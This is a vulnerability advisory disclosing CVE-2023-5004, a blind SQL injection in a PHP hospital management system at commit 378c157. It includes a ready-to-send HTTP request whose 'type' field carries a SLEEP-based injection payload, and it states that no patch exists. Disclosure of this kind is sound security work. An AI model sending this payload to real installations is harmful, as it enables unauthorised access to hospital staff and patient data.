Hospital-management-system-in-php 378c157 - Blind SQL Injection
Summary
| Name | Hospital-management-system-in-php 378c157 - Blind SQL Injection |
| Code name | |
| Product | Hospital Management System |
| Affected versions | Version 378c157 |
| State | Public |
| Release date | 2023-09-28 |
Vulnerability
| Kind | SQL injection |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVSSv3.1 Base Score | 9.8 |
| Exploit available | Yes |
| CVE ID(s) |
Description
Hospital management system version 378c157 allows to bypass authentication. This is possible because the application is vulnerable to SQLI.
Vulnerability
A sql injection (SQLI) vulnerability has been identified in Hospital management system. This allows bypassing authentication and access as any user, in this case administrator.
Exploit
POST /hospital/hms-staff.php HTTP/1.1
Host: vulnerable.com
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=p77e9snm8g836b5lar3qb6l8ahj
Connection: close
email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-5004 to refer to this issue from now on.
System Information
-
Version: hospital-management-system-in-php 378c157
-
Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/projectworldsofficial/hospital-management-system-in-php/
Timeline
2023-09-15
Vulnerability discovered.
2023-09-15
Vendor contacted.
2023-09-28
Public Disclosure.
